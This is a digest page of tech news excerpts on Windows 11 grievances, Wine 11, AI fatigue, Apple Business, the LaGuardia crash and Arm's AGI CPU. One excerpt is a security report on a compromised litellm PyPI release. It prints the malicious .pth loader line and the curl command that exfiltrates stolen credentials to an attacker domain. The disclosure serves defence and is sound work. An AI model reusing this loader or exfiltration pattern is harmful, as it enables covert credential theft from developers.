10 interesting stories served every morning and every evening.
Microsoft just announced a 7-point plan to fix Windows 11, and the tech press is treating it like a redemption arc. Pavan Davuluri, the Windows president, admitted in January 2026 that “Windows 11 had gone off track” and said Microsoft was entering a mode called “swarming” where engineers would be pulled off new features to fix existing problems.
I saw this headline and my first thought was: it’s like being in an abusive relationship. They beat you, then show up with flowers saying they’ve changed. And everyone around you says “see, they’re getting better.” But the bruises are still there and the apology only covers the hits people noticed.
I want to walk through what Microsoft actually did to Windows 11 over the past four years, because this “fix” announcement only makes sense when you see the full damage list and realize that the worst offenses aren’t even part of the repair plan.
The Copilot invasion started September 26, 2023, when Microsoft pushed their AI chatbot into Windows 11 ahead of the formal 23H2 release. The icon appeared between your Start menu and system tray, you couldn’t move it, you couldn’t remove it through normal settings, and it hijacked the Win+C keyboard shortcut. Over the next two years, Copilot buttons metastasized into Snipping Tool, Photos, Notepad, Widgets, File Explorer context menus, Start menu search, and system Settings. Microsoft even planned to force-install the Microsoft 365 Copilot app directly onto Start menus of “eligible PCs.” The new plan promises to remove all of that. They want credit for pulling their hand out of your pocket.
On April 24, 2024, Microsoft shipped update KB5036980, which injected advertisements into the Windows 11 Start menu’s “Recommended” section. These showed up labeled “Promoted” and pushed apps like Opera browser and some password manager nobody asked for. And the Start menu was just one surface, they also placed ads on the lock screen, in the Settings homepage hawking Game Pass subscriptions, inside File Explorer pushing OneDrive, and through “tip” notifications that were thinly veiled product pitches. The “fix” promises “fewer ads.” Fewer. The operating system you paid $139 for at retail should have exactly zero ads, and the fact that “fewer” is supposed to impress anyone shows how thoroughly Microsoft has lowered the bar.
The privacy angle is where this gets dangerous. When Windows 11 launched in October 2021, Home edition required a Microsoft account during setup. By October 2025, Microsoft had systematically hunted down and killed every single workaround for creating a local account, the `oobe\bypassnro` command, the BypassNRO registry toggle, the `ms-cxh:localonly` trick, even the old fake email method. Amanda Langowski from Microsoft stated it plainly: they were “removing known mechanisms for creating a local account in the Windows Setup experience.”
A Microsoft account means your identity is tied to your OS from first boot. Your activity, your app usage, your browsing through Edge, your files through OneDrive, all funneled into a profile Microsoft controls. And this particular abuse is nowhere in the 7-point fix plan.
OneDrive got the same treatment. Microsoft silently changed Windows 11 setup in 2024 so that OneDrive folder backup enables automatically with no consent dialog, syncing your Desktop, Documents, Pictures, Music, and Videos to Microsoft’s cloud. When people discovered this and tried to turn it off, their files disappeared from their local machine because OneDrive had moved them, transferred ownership of your personal files to their cloud service without asking. Author Jason Pargin went viral describing how OneDrive activated itself, moved his files, then started deleting them when he hit the free 5GB storage limit. Microsoft’s response to this was silence. Also not in the fix plan.
Windows Recall is worth lingering on. Announced May 2024, it’s an AI feature that screenshots everything on your screen every few seconds and makes it searchable. Security researcher Kevin Beaumont demonstrated that the entire Recall database was stored in plaintext in an AppData folder where any malware could extract it. Bank numbers, Social Security numbers, passwords, all sitting in an unencrypted SQLite database.
The UK’s Information Commissioner’s Office got involved. Microsoft delayed it, made it opt-in, added encryption, and quietly relaunched it for Insiders in November 2024. They built a surveillance feature, shipped it broken, got caught, and called the patch “responding to feedback.”
But the abuse pattern goes back way further than Windows 11. In 2015 and 2016, Microsoft ran the GWX (Get Windows 10) campaign, full-screen nag dialogs that pushed Windows 10 upgrades on Windows 7 and 8 users. In May 2016, they changed the behavior of the red X button so that clicking it, which for decades had meant “close” or “cancel”, instead scheduled the Windows 10 upgrade. Microsoft’s own security advice told users to close suspicious dialogs using the X button, and they weaponized that trained behavior against their own customers. A woman named Teri Goldstein sued after the forced upgrade bricked her travel agency PC and won $10,000. Microsoft appealed, then dropped the appeal and paid. They eventually admitted they “went too far.”
And right now, Microsoft is about to force 240 million PCs into the landfill. Windows 10 hit end of life on October 14, 2025, and Windows 11 requires TPM 2.0, specific CPU generations, UEFI Secure Boot, hardware requirements that excluded roughly 20% of all PCs worldwide. Perfectly functional machines, rendered “obsolete” by arbitrary software restrictions. If you want to keep getting security patches on Windows 10, Microsoft will charge you $30 per year, paying for patches to an operating system you already bought a license for. Enterprise customers pay $61 per device for Year 1, $122 for Year 2, and $244 for Year 3, with the price doubling each year.
Edge is its own disaster. Mozilla commissioned an independent report titled “Over the Edge” that documented specific dark patterns including confirmshaming (pop-ups implying you’re “shopping in a dumb way” if you don’t use Edge), disguised ads injected into Google.com and the Chrome Web Store, and default browser settings that hijack back to Edge without notification. Certain Windows web links still force-open in Edge regardless of your default browser setting. Despite all this manipulation, Edge holds just 5.35% global market share. Even with the full weight of an operating system monopoly forcing their browser on people, almost nobody chooses to use it.
And the telemetry question. On Windows 11 Home and Pro, you cannot fully disable telemetry. Setting `AllowTelemetry` to 0 in the registry on non-Enterprise editions gets silently overridden back to 1. Only Enterprise and Education editions can actually turn it off. The operating system you paid for reports data about you to Microsoft, and the setting to stop it is a lie on consumer editions. Also not in the fix plan.
I haven’t even mentioned the EU fining Microsoft over 2.2 billion euros across multiple antitrust rulings, including 561 million euros specifically for breaking a browser ballot promise, a Windows 7 update silently removed the choice screen for 14 months, affecting 15 million users, and it was the first time the EU fined a company for violating a “commitment decision.” Or the _NSAKEY controversy from 1999 where a second crypto key labeled literally `_NSAKEY` was found embedded in Windows NT. Or the time in August 2024 when a Microsoft update bricked Linux dual-boot systems across Ubuntu, Mint, and other distros, and it took 9 months to fully fix.
Ok so here’s the table that tells the whole story:
The bottom four rows are the ones that matter. The privacy-hostile changes, the forced Microsoft accounts, the telemetry that lies about being disabled, OneDrive hijacking your files, the pre-installed garbage, none of that is part of the fix plan. Microsoft’s “swarming” effort targets the most visible UI annoyances, the ones that generate bad headlines. Data collection, vendor lock-in, forced accounts, those stay because those are the revenue model.
Microsoft spent four years deliberately degrading an operating system that people paid $139 or more for, and now they’re announcing the removal of their own damage as if it’s a gift. The “fix” is them taking their foot off your neck and expecting applause. The ads should have never been there, the Copilot buttons should have never been forced, and the taskbar should have never been crippled in the first place. And the things they’re choosing to keep, the telemetry, the forced accounts, the data harvesting, those are the real product, because at this point, you are.
...
Read the original on www.sambent.com »
Linux gaming has come a long way. When Valve launched Proton back in 2018, it felt like a turning point, turning the Linux gaming experience from “technically possible if you’re okay with a lot of pain” to something that more or less worked. Since then, we’ve seen incremental Wine releases, each one chipping away at compatibility issues and improving performance bit by bit. Wine 10, Wine 9, and so on; each one a collection of bug fixes and small improvements that kept the ecosystem moving forward.
Wine 11 is different. This isn’t just another yearly release with a few hundred bug fixes and some compatibility tweaks. It represents a huge number of changes and bug fixes. However, it also ships with NTSYNC support, which is a feature that has been years in the making and rewrites how Wine handles one of the most performance-sensitive operations in modern gaming. On top of that, the WoW64 architecture overhaul is finally complete, the Wayland driver has grown up a lot, and there’s a big list of smaller improvements that collectively make this feel like an all-new project.
I should be clear: not every game is going to see a night-and-day difference. Some titles will run identically to before. But for the games that do benefit from these changes, the improvements range from noticeable to absurd. And because Proton, SteamOS, and every downstream project builds on top of Wine, those gains trickle down to everyone.
Everything up until now was a workaround
Esync and fsync worked, but they weren’t ideal
If you’ve spent any time tweaking Wine or Proton settings, you’ve probably encountered the terms “esync” and “fsync” before. Maybe you toggled them on in Lutris, or noticed them in Proton launch options, without fully understanding what they do. To understand why NTSYNC matters, you need to understand the problem these solutions were all trying to solve.
Windows games, especially modern ones, are heavily multi-threaded. Your CPU isn’t just running one thing at a time, and instead, it’s juggling rendering, physics calculations, asset streaming, audio processing, AI routines, and more, all in parallel across multiple threads. These threads need to coordinate with each other constantly. One thread might need to wait for another to finish loading a texture before it can render a frame. Another might need exclusive access to a shared resource so two threads don’t try to modify it simultaneously.
Windows handles this coordination through what are called NT synchronization primitives… mutexes, semaphores, events, and the like. They’re baked deep into the Windows kernel, and games rely on them heavily. The problem is that Linux doesn’t have native equivalents that behave exactly the same way. Wine has historically had to emulate these synchronization mechanisms, and the way it did so was, to put it simply, not ideal.
The original approach involved making a round-trip RPC call to a dedicated “kernel” process called wineserver every single time a game needed to synchronize between threads. For a game making thousands of these calls per second, that overhead added up fast and served to be a bottleneck. And it was a bottleneck that manifested as subtle frame stutters, inconsistent frame pacing, and games that just felt a little bit off even when the raw FPS numbers looked fine.
Esync was the first attempt at a workaround. Developed by Elizabeth Figura at CodeWeavers, it used Linux’s eventfd system call to handle synchronization without bouncing through the wineserver. It worked, and it helped, but it had quirks. Some distros ran into issues with file descriptor limits, since every synchronization object needed its own file descriptor, and games that opened a lot of them could hit the system’s ceiling quite quickly.
Fsync came next, using Linux futexes for even better performance. It was faster than esync in most cases, but it required out-of-tree kernel patches that never made it into the mainline Linux kernel or to upstream Wine out of the box. That meant you needed a custom or patched kernel to use it, which is fine for enthusiasts running CachyOS or Proton-GE, but not exactly accessible for the average user on Ubuntu or Fedora. Futex2, often referred to interchangeably with fsync, did make it to Linux kernel 5.16 as futex_waitv, but the original implementation of fsync isn’t that. Fsync used futex_wait_multiple, and Futex2 used futex_waitv. Applications such as Lutris still refer to it as Fsync, though. It’s still kind of fsync, but it’s not the original fsync.
Here’s the thing about both esync and fsync: they were workarounds. Clever ones, but workarounds nonetheless. They approximated NT synchronization behavior using Linux primitives that weren’t designed for the job, and certain edge cases simply couldn’t be handled correctly. Operations like NtPulseEvent() and the “wait-for-all” mode in NtWaitForMultipleObjects() require direct control over the underlying wait queues in ways that user-space implementations just can’t reliably provide.
Synchronization at the kernel-level, rather than in user-space
NTSYNC takes a completely different approach. Instead of trying to shoehorn Windows synchronization behavior into existing Linux primitives, it adds a new kernel driver that directly models the Windows NT synchronization object API. It exposes a /dev/ntsync device that Wine can talk to, and the kernel itself handles the coordination. No more round trips to wineserver, no more approximations, and the synchronization happens in the kernel, which is where it should be. And it has proper queue management, proper event semantics, and proper atomic operations.
What makes this even better is that NTSYNC was developed by the same person who created esync and fsync in the first place. Elizabeth Figura has been working on this problem for years, iterating through multiple kernel patch revisions, presenting the work at the Linux Plumbers Conference in 2023, and pushing through multiple versions of the patch set before it was finally merged into the mainline Linux kernel with version 6.14.
The numbers are wild. In developer benchmarks, Dirt 3 went from 110.6 FPS to 860.7 FPS, which is an impressive 678% improvement. Resident Evil 2 jumped from 26 FPS to 77 FPS. Call of Juarez went from 99.8 FPS to 224.1 FPS. Tiny Tina’s Wonderlands saw gains from 130 FPS to 360 FPS. As well, Call of Duty: Black Ops I is now actually playable on Linux, too. Those benchmarks compare Wine NTSYNC against upstream vanilla Wine, which means there’s no fsync or esync either. Gamers who use fsync are not going to see such a leap in performance in most games.
The games that benefit most from NTSYNC are the ones that were struggling before, such as titles with heavy multi-threaded workloads where the synchronization overhead was a genuine bottleneck. For those games, the difference is night and day. And unlike fsync, NTSYNC is in the mainline kernel, meaning you don’t need any custom patches or out-of-tree modules for it work. Any distro shipping kernel 6.14 or later, which at this point includes Fedora 42, Ubuntu 25.04, and more recent releases, will support it. Valve has already added the NTSYNC kernel driver to SteamOS 3.7.20 beta, loading the module by default, and an unofficial Proton fork, Proton GE, already has it enabled. When Valve’s official Proton rebases on Wine 11, every Steam Deck owner gets this for free.
All of this is what makes NTSYNC such a big deal, as it’s not simply a run-of-the-mill performance patch. Instead, it’s something much bigger: this is the first time Wine’s synchronization has been correct at the kernel level, implemented in the mainline Linux kernel, and available to everyone without jumping through hoops.
If NTSYNC is the headline feature, the completion of Wine’s WoW64 architecture is the change that will quietly improve everyone’s life going forward. On Windows, WoW64 (Windows 32-bit on Windows 64-bit) is the subsystem that lets 32-bit applications run on 64-bit systems. Wine has been working toward its own implementation of this for years, and Wine 11 marks the point where it’s officially done.
What this means in practice is that you no longer need 32-bit system libraries installed on your 64-bit Linux system to run 32-bit Windows applications. Wine handles the translation internally, using a single unified binary that automatically detects whether it’s dealing with a 32-bit or 64-bit executable. The old days of installing multilib packages, configuring ia32-libs, or fighting with 32-bit dependencies on your 64-bit distro thankfully over.
This might sound like a small quality-of-life improvement, but it’s a massive piece of engineering work. The WoW64 mode now handles OpenGL memory mappings, SCSI pass-through, and even 16-bit application support. Yes, 16-bit! If you’ve got ancient Windows software from the ’90s that you need to run for whatever reason, Wine 11 has you covered.
For gaming specifically, this matters because a surprising number of games, especially older ones, are 32-bit executables. Previously, getting these to work often meant wrestling with your distro’s multilib setup, which varied in quality and ease depending on whether you were on Ubuntu, Arch, Fedora, or something else entirely. Now, Wine just handles it for you.
The rest of Wine 11 isn’t just filler
There are more fixes, too
It’s easy to let NTSYNC and WoW64 steal the spotlight, but Wine 11 is packed to the gills with other stuff worth talking about.
The Wayland driver has come a long way. Clipboard support now works bidirectionally between Wine and native Wayland applications, which is one of those things you don’t think about until it doesn’t work and it drives you mad. Drag-and-drop from Wayland apps into Wine windows is supported. Display mode changes are now emulated through compositor scaling, which means older games that try to switch to lower resolutions like 640x480 actually behave properly instead of leaving you with a broken desktop. If you’ve been holding off on switching from X11 to Wayland because of Wine compatibility concerns, Wine 11 removes a lot of those barriers.
On the graphics front, EGL is now the default backend for OpenGL rendering on X11, replacing the older GLX path. Vulkan support has been bumped to API version 1.4, and there’s initial support for hardware-accelerated H.264 decoding through Direct3D 11 video APIs using Vulkan Video. That last one is particularly interesting for games and applications that use video playback for things like cutscenes or in-game streaming.
Force feedback support has been improved for racing wheels and flight sticks, which is great news if you’re running a sim setup on Linux. As well, Bluetooth has received a new driver with BLE services and proper pairing support, MIDI soundfont handling has been improved for legacy game music, and there are a couple of minor extras like Zip64 compression support, Unicode 17.0.0 support, TWAIN 2.0 scanning for 64-bit apps, and IPv6 ping functionality.
Thread priority management has been improved on both Linux and macOS, which helps with multi-threaded application performance beyond just the NTSYNC gains. ARM64 devices can now simulate 4K page sizes on systems with larger native pages, which keeps the door open for Wine on Arm hardware. And with more Arm-based Linux devices showing up every year, that matters more than it used to.
Plus, there are a ton of bug fixes. Games like Nioh 2, StarCraft 2, The Witcher 2, Call of Duty: Black Ops II, Final Fantasy XI, and Battle.net all received specific compatibility fixes, which is additional to the broader improvements made across the board that will improve performance and compatibility across significantly more titles.
Wine 11 is a big release, and it’s not just NTSYNC that makes it the case. Sure, NTSYNC alone would have made it worth paying attention to, but combined with the WoW64 completion, the Wayland improvements, and the sheer volume of fixes, it’s the most important Wine release since Proton made Linux gaming viable. Everything built on top of Wine, from Proton to Lutris to Bottles, gets better because of it. If you play games on Linux at all, Wine 11 is worth your time trying out.
...
Read the original on www.xda-developers.com »
At serious risk of sounding like a heretic here, but I’m kinda bored of talking about AI.
I get it, AI is incredible. I use it every day, it’s completely changed my workflow. I recently started a new role in a tricky domain working at web scale (hey, remember web scale?) and it’s allowed me to go from 0-1 in terms of productivity in a matter of weeks.
With that being said, it’s all starting to feel a bit… routine. I’m not here to argue that the pace of change has been incredible, but on a day-to-day basis I’ve sorta ran out of things to talk about. What makes this worse is it’s completely taken over mindshare across my section of the internet.
Hacker News, my favourite haunt, used to be full of interesting projects and problems being solved but this seems to have devolved into three different people’s (almost identical) Claude code workflow and yet another post about how you got OpenClaw to stroke your cat and play video games so you had way more time to… configure AI tooling. This all feels a little self-fulfilling.
Kagi small web
is another great example of this effect. Here’s a challenge, open it up and press the ‘next’ button 20 times. What percentage of posts are AI related?
Before you write me off as ‘old man yells at cloud’, understand where I’m coming from. In the good old days (2023), before we called anybody who could open a Claude code terminal an ‘AI engineer’, being a ‘Product Engineer’ was the hot new term. The idea was that engineers should move away from obsessing over code to obsessing over the product value they were delivering. I loved this, it made loads of sense to me, but we seem to have regressed. It’s no longer the code we’re obsessing over, it’s the overgrown auto-complete we’ve developed to make the easiest part of being an engineer easier.
It’s like if I went onto the woodworking subreddit and they’d all stopped showing pictures of the tables they’d created and just started posting about the hammer they were using. But they were all using basically the same hammer in the same way, so they were just screaming the same shit at each other at the top of their voices.
What makes this worse, is our bosses have bought into it this time too. My managers never cared much about database technologies, IDE’s or javascript frameworks; they just wanted the feature so they could sell it. Management seems to have stepped firmly and somewhat haphazardly into the implementation detail now. I reckon most of us have got some sort of company initiative to ‘use more AI’ in our objectives this year. Management’s involvement in the SDLC has always been a thing, DORA metrics have been around for a while. But historically, it’s always been about the outputs. Faster deploys, time to respond. Now we’re measuring the number of tokens used per-dev, which is no more useful than lines of code ever was.
I guess what I’m saying, other than just having a general whinge, is tell me more about the cool shit you’re building rather than the tools you’re using to build it. And don’t forget that the whole purpose of coding, like any other craft, is to create something that delivers value for someone. Even if that someone is just yourself.
… And yes, I’m painfully aware of the irony of a post about moaning about posts about AI. Sorry.
...
Read the original on blog.jakesaunders.dev »
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package’s own RECORD:
pip download litellm==1.82.8 –no-deps -d /tmp/check
python3 -c ”
import zipfile, os
whl = ‘/tmp/check/’ + [f for f in os.listdir(‘/tmp/check’) if f.endswith(‘.whl’)][0]
with zipfile.ZipFile(whl) as z:
pth = [n for n in z.namelist() if n.endswith(‘.pth’)]
print(‘PTH files:’, pth)
for p in pth:
print(z.read(p)[:300])
You will see litellm_init.pth containing:
import os, subprocess, sys; subprocess.Popen([sys.executable, “-c”, “import base64; exec(base64.b64decode(‘…’))“])
The payload is double base64-encoded. When decoded, it performs the following:
The script collects sensitive data from the host system:
* Webhook URLs: grep for Slack/Discord webhook URLs in env and config files
The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
Both encrypted files are packed into tpcp.tar.gz
The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
“https://models.litellm.cloud/” \
-H “Content-Type: application/octet-stream” \
-H “X-Filename: tpcp.tar.gz” \
–data-binary @tpcp.tar.gz
* Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
* Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
* Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
* Other versions: Not yet checked — the attacker may have compromised multiple releases
Users: Check for litellm_init.pth in your site-packages/ directory
Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
...
Read the original on github.com »
Introducing Apple Business — a new all‑in‑one platform for businesses of all sizes
Apple Business combines built-in mobile device management, business email and calendar services with custom domain support, and a powerful new option to reach local customers
Apple today announced Apple Business, a new all-in-one platform that includes key services companies need to effortlessly manage devices, reach more customers, equip team members with essential apps and tools, and get support from experts to run and grow efficiently and securely. Apple Business features built-in mobile device management, helping businesses easily configure employee groups, device settings, security, and apps with Blueprints to quickly get started. In addition, customers can now set up business email, calendar, and directory services with their own domain name for seamless and elevated communication and collaboration. And Apple Business can help millions of companies grow their reach and connect with local customers across Apple Maps, Mail, Wallet, Siri, and more, including a new option coming this summer that will enable businesses in the U. S. and Canada to place local ads in Maps during key search and discovery moments. Apple Business will be available starting Tuesday, April 14, in more than 200 countries and regions.1
“Apple Business is a significant leap forward in our decades-long commitment to helping companies of all sizes leverage the power of Apple products and services to run and grow,” said Susan Prescott, Apple’s vice president of Enterprise and Education Marketing. “We’ve unified Apple’s strongest business offerings into one simple, secure platform, delivering key features for organizations in every stage and sector, including built-in device management, collaboration tools, and additional ways to reach new customers. We can’t wait to see how Apple Business helps companies spend more time focusing on what they love and connecting deeply with their communities.”
Apple Business offers built-in mobile device management (MDM), facilitating a comprehensive view of an organization’s Apple devices, settings, and more from a single interface. Previously available as a subscription within Apple Business Essentials in the U. S., Apple Business is designed to make IT easy — including for small businesses without dedicated IT resources. Apple Business includes new Blueprints to easily set up devices with preconfigured settings and apps, ensuring consistency and security and enabling zero-touch deployment for employees, so that new Apple products are ready to go out of the box.2
Apple Business includes options to purchase upgraded iCloud storage and support with AppleCare+ for Business, and a companion Apple Business app will allow employees to install apps for work, view colleague contact information, and request support while on the go.3
Apple Business expands the availability of Apple Business Manager to more than 200 countries and regions, and supports additional device management features, including:
* Managed Apple Accounts: Company data remains secure while employee data remains private, with cryptographic separation of work and personal data on devices. Apple Business enables automated Managed Apple Account creation for new employees through integration with an identity service provider, including Google Workspace, Microsoft Entra ID, and more.
* Employee management: Create user groups by function or team to assign apps and roles. Organizations can also create custom roles to manage access exactly the way they want.
* App distribution: Easily acquire and distribute apps to employees and teams through the App Store.
* Admin API: Simplify large deployments with API access to device, user, audit, and MDM service data.
New Ways to Manage Productivity and Collaboration
Apple Business introduces fully integrated email, calendar, and directory services that are designed to make it seamless to start a new business with a professional identity. Businesses can bring their own custom domain name or purchase a new one through Apple Business, helping founders elevate communication and collaboration. These services streamline operations, with scheduling tools like calendar delegation and a built-in company directory to make it easy for employees to connect with user groups and personalized contact cards.
Every day, users choose Apple Maps to discover and explore places and businesses around them. Beginning this summer in the U. S. and Canada, businesses will have a new way to be discovered by using Apple Business to create ads on Maps. Ads on Maps will appear when users search in Maps, and can appear at the top of a user’s search results based on relevance, as well as at the top of a new Suggested Places experience in Maps, which will display recommendations based on what’s trending nearby, the user’s recent searches, and more. Ads will be clearly marked to ensure transparency for Maps users.
Ads on Maps builds on Apple’s broader privacy-first approach to advertising, and maintains the same privacy protections Maps users enjoy today. A user’s location and the ads they see and interact with in Maps are not associated with a user’s Apple Account. Personal data stays on a user’s device, is not collected or stored by Apple, and is not shared with third parties. When Apple Business is available in April, businesses will need to first claim their location on Maps. Once ads on Maps is available, businesses will be able to access a fully automated experience of creating ads through Apple Business in a few simple steps. Current Apple Ads advertisers and agencies will also have the option to book ads through their existing Apple Ads experience, which will offer additional customization options for their ad campaigns.
Brand and Location Features in One Convenient Place
Brand management tools previously available in Apple Business Connect will now be available through Apple Business, making it easier than ever for businesses to set up and manage how their brand and locations appear across Apple services and apps.
* Brand profiles: Manage brand name, logo, and key details consistently across Apple Maps, Wallet, and other features and apps.
* Rich place cards: Customize with photos, detailed location information, hours, and other useful details that display across Apple Maps, Safari, Spotlight, and more.
* Showcases and custom actions: Highlight deals, special offers, new products, or seasonal items on place cards in Maps. Add custom actions like order or reserve to direct customers to a preferred website or app.
* Location insights: Gain valuable insights into how customers discover and interact with businesses on Maps, including search, views, and taps on actions.
* Branded communications: Display branding prominently in the Mail app and on iCloud Mail to increase awareness. Branding will display with tracked orders in Wallet for a more recognizable customer experience.
* Tap to Pay on iPhone: Build trust by displaying a brand logo and name on the payment screen when accepting payments directly on iPhone.
* Starting April 14, Apple Business will be available as a free service in the U.S. and 200+ countries and regions to new and existing users of Apple Business Connect, Apple Business Essentials, and Apple Business Manager. For more information, visit business.apple.com/preview.
* Ads on Apple Maps will be available to businesses starting this summer in the U.S. and Canada. For more information, visit ads.apple.com/maps.
* Apple Business Essentials, Apple Business Manager, and Apple Business Connect will no longer be available once Apple Business launches. Business Essentials customers will no longer be charged their monthly service fee for device management after April 14. Existing Business Connect data — including claimed locations, place card information, photos, organization information, account details, and more — will automatically migrate to Apple Business at launch.
* The Apple Business companion app, along with email, calendar, and directory features, will require iOS 26, iPadOS 26, or macOS 26.
* Customers in the U.S. can purchase additional iCloud storage up to 2TB per user, starting at $0.99 per user per month. AppleCare+ for Business coverage is available per device or per user, starting at $6.99 per month, or $13.99 per month per user for up to three devices.
Apple Business is available globally; certain features may be available in select countries and regions. See business.apple.com/preview for more details.
Zero-touch deployment is available when devices are purchased through Apple or Apple Authorized Resellers.
Additional iCloud storage and AppleCare+ for Business are available as additional paid offerings.
...
Read the original on www.apple.com »
“We are surveilling markets and our approach to market abuse will be to look at the evidence in front of us. I can’t speak for what our US colleagues are doing,” he said.
...
Read the original on www.bbc.com »
...
Read the original on www.answer.ai »
Pilot safety concerns about New York’s LaGuardia airport were filed to aviation officials months before Sunday’s collision between an airplane and a fire truck left two pilots dead and 41 other people hospitalized.
According to the aviation safety reporting system administered by the US space agency Nasa, a pilot using the airport in the summer wrote, “Please do something,” after air traffic controllers failed to provide appropriate guidance about multiple nearby aircraft.
“The pace of operations is building in LGA,” they wrote, referring to the New York City airport, one of the busiest in the US. “The controllers are pushing the line.”
In a reference to the January 2025 mid-air collision over the Potomac River in Washington DC that killed more than 60 people, they said: “On thunderstorm days, LGA is starting to feel like [Ronald Reagan National airport] did before the accident there.”
The warning, first reported by CNN, showed that the pilot of the aircraft was concerned that LaGuardia’s control tower initiated a takeoff clearance for an aircraft when their plane was “only 300 feet high on final” approach on a different runway — and the departing plane had hesitated initiating its takeoff run.
“I think he or she thought twice before starting their takeoff roll,” the pilot of the aircraft said. The pilot mentioned how thick, smoky haze from wildfires in Canada at the time as well as a possible helicopter in the area had convinced him it was “safer to continue the approach and land [about] 10 seconds after the departing aircraft crossed our path”.
Otherwise, the pilot added, he would have been left “suddenly going around and trusting that the helicopter was not near the departure end of 22”, with the number referring to a runway.
The pilot concluded: “the [air traffic control] guidance … does not seem to give guidance on exactly how close aircraft in this situation can get.”
“Based on today’s and close calls I have seen over the years for [runways at the Philadelphia and Newark international airports], it seems to be a [judgment] call by the local controller.”
They also said that a runway lighting system had been turned off. In another report since January 2025, a pilot said their aircraft had been cleared to cross a runway — but crossing “we noticed an aircraft we thought was landing at [runway] 31C seemingly headed for us.”
Air traffic control “should have sent the aircraft around”, they said.
Nasa’s Aviation Safety Reporting System has received dozens of anonymous pilot complaints about safety concerns at the smallest of New York’s three local airports.
The reports come as investigators are looking into the collision of a landing Air Canada Express flight 646 from Montreal that collided with an airport firetruck that had been cleared to cross the runway, leading to the deaths of pilots MacKenzie Gunther and Antoine Forest as well as injuries to dozens more.
After the air traffic controller cleared the fire truck, which was responding to a plane that had reported difficulties, the controller then tried to stop it from crossing. He could later be heard saying on a recording that he had been “dealing with an emergency earlier” and that he “messed up”.
The crash has raised fears that operations at US airports are under extreme stress. Airports have been dealing with a shortage of air traffic controllers, exacerbated by brutal federal government personnel cuts by Donald Trump’s administration at the start of his second presidency.
Airports have also grappled with ageing equipment and a shortage of security screeners owing to a partial government shutdown since mid-February, which has caused long security lines and frustration among travelers. More than 450 TSA officers have quit during the partial government shutdown, Department of Homeland Security said on Tuesday.
“We did not need another aviation tragedy to see this coming,” said to aviation expert Brian Fielkow in a comment to the Guardian. An investigation into the collision will take take time, he warned, but “let’s stop pretending we don’t understand the conditions in which this is happening.
“We are watching a system under strain. TSA professionals are showing up to work without pay. This creates distraction, instability and unnecessary risk. We are asking people responsible for securing our transportation system to operate under financial and emotional strain and expecting flawless performance. We are managing aviation safety like a political pawn instead of a system that cannot fail.”
Federal investigators said late on Monday it was too soon to answer many questions about Sunday’s deadly accident but promised more information would be released Tuesday.
Jennifer Homendy, the National Transportation Safety Board (NTSB) chair whose agency is investigating Sunday’s crash, said investigators would analyze the involved airplane’s cockpit and flight data recorders, which were recovered from the wreck undamaged.
She said the runway where the crash happened was likely to be closed for days as investigators sift through a “tremendous amount of debris”.
Homendy also said that an NTSB investigator sent to LaGuardia on Monday was delayed for three hours by security lines in Houston.
“Our air traffic control specialist, who was in line … for three hours, until we called … to beg, to see if we can get her through, so we can get her here.
“So it’s been a really big challenge to get the entire team here, and they’re still arriving as we speak,” Homandy added.
The Trump administration has sent Immigration and Customs Enforcement (ICE) agents to many US airports, claiming they are there to help with long pre-security lines.
Adam Stahl, the acting TSA deputy administrator, told Fox News that ICE agents would be “conducting non-specialized security support — manning the exit lanes, crowd management, line control … to help alleviate the challenges that our officers are facing”.
Hundreds of Transportation Security Administration (TSA) agents have called in sick or quit their jobs rather than be forced to work without pay amid the shutdown. The shutdown stems from the US Senate not funding the TSA’s parent agency over a disagreement over immigration enforcement reforms.
Sean Duffy, the US transportation secretary, on Monday declined to say how many controllers were on duty at LaGuardia when Sunday’s crash happened, deferring instead to the ongoing NTSB investigation.
But he denied rumors that the tower had only one controller on duty. He said LaGuardia was “very well staffed”, with 33 certified controllers and more in training. He said the goal was to have 37 on staff.
Sunday’s incident was not the only collision at LaGuardia in recent months. In October, two Delta jets collided on a taxiway, sending one person to a hospital.
In July 2024, a co-pilot reported a similar near-collision after controllers said a plane was cleared to cross the runway even though another aircraft was landing at the same time.
“Ground control issued a stop command just in time,” the report entry said.
...
Read the original on www.theguardian.com »
...
Read the original on www.githubstatus.com »
Today, Arm is announcing the Arm AGI CPU, a new class of production-ready silicon built on the Arm Neoverse platform and designed to power the next generation of AI infrastructure.
For the first time in our more than 35-year history, Arm is delivering its own silicon products — extending the Arm Neoverse platform beyond IP and Arm Compute Subsystems (CSS) to give customers greater choice in how they deploy Arm compute — from building custom silicon to integrating platform-level solutions or deploying Arm-designed processors. It reflects both the rapid evolution of AI infrastructure and growing demand from the ecosystem for production-ready Arm platforms that can be deployed at pace and scale.
AI systems are increasingly operating continuously at global scale. Historically, the human was the bottleneck in computing — the pace at which people could interact with systems defined how quickly work could move through them. In the era of agentic AI, that constraint disappears as software agents coordinate tasks, interact with multiple models and make decisions in real time.
As AI systems run continuously and workloads grow in complexity, the CPU becomes the pacing element of modern infrastructure — responsible for keeping distributed AI systems operating efficiently at scale. In a modern-day AI data center, the CPU manages thousands of distributed tasks — orchestrating accelerators, managing memory and storage, scheduling workloads and moving data across systems — and now, with agentic AI, coordinating fan-out across large numbers of agents.
This shift places new demands on the CPU and that requires an evolution of the processor.
Arm Neoverse already underpins many of today’s leading hyperscale and AI platforms, including AWS Graviton, Google Axion, Microsoft Azure Cobalt and NVIDIA Vera. As AI infrastructure scales globally, partners across the ecosystem are asking Arm to do more. The Arm AGI CPU was created to address this shift.
Agentic AI workloads demand sustained performance at massive scale. The Arm AGI CPU is designed to deliver high per-task performance at sustained load across thousands of cores in parallel — all within the power and cooling limits of modern data centers.
